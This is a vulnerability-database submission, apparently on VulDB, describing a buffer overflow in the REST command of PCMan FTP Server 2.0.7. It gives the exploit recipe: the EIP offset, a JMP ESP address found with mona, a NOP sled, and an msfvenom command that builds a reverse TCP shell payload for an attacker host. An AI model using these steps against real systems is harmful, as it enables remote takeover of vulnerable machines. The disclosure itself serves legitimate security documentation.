| Titre | PCMan FTP Server 2.0.7 Buffer Overflow |
|---|
| Description | This exploitation technique was successfully validated against Windows XP Professional, Service Pack 2 and Service Pack 3, targeting the 32-bit build of PcMan FTP Server version 2.0.7.
The vulnerability assessment began with a series of fuzzing attempts, where large amounts of data were sent through various FTP commands. It was identified that the REST command (also known as REST) was vulnerable to a buffer overflow condition when supplied with an excessively long input. This caused the application to crash, indicating an overwrite of critical memory regions, including the Instruction Pointer (EIP).
To accurately determine the offset at which EIP was overwritten, the Metasploit Framework utilities msf-pattern_create -l 5000 and msf-pattern_offset -q <crashed_EIP> were employed. These tools generate a unique pattern and calculate the offset value, respectively. In this specific case, the EIP was found to be overwritten after 2006 bytes of input.
Once the offset was confirmed, the next phase involved redirecting the execution flow to a controlled memory region. Using Mona.py, a plugin for Immunity Debugger, the following command was executed to locate a reliable JMP ESP instruction within a non-ASLR, non-SAFESEH module:
!mona jmp -r esp -n
The address 0x74e32fd9 was selected, as it met the necessary exploitability criteria (e.g., static address, executable memory, no bad characters).
Prior to appending the shellcode, a NOP sled (\x90 \* 20) was added to provide a safe landing zone. The shellcode itself was generated using the following msfvenom command:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.2 LPORT=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform windows -f python
The bad characters \x00, \x0a, and \x0d were explicitly excluded due to their disruptive nature in this context (null termination, newline, carriage return). A complete bytearray-based bad character analysis was omitted, as the environment and server behavior were already well-characterized through prior experimentation.
The final payload structure was as follows:
[prefix buffer (2006 bytes)] + [EIP overwrite] + [NOP sled (20 bytes)] + [reverse shell shellcode]
Upon successful transmission of the payload via the REST command, the application’s execution flow was hijacked, leading to the execution of the shellcode and establishment of a reverse TCP shell to the attacker's machine. This confirms the exploit's ability to achieve arbitrary code execution with remote access. |
|---|
| La source | ⚠️ https://github.com/Blu3B3ard/PoC-Pacman-FTP-Server-2.0.7/blob/main/exploit.txt |
|---|
| Utilisateur | Blu3B3ard (UID 85197) |
|---|
| Soumission | 12/05/2025 13:35 (il y a 11 mois) |
|---|
| Modérer | 16/05/2025 21:29 (4 days later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 309413 [PCMan FTP Server 2.0.7 REST Command buffer overflow] |
|---|
| Points | 20 |
|---|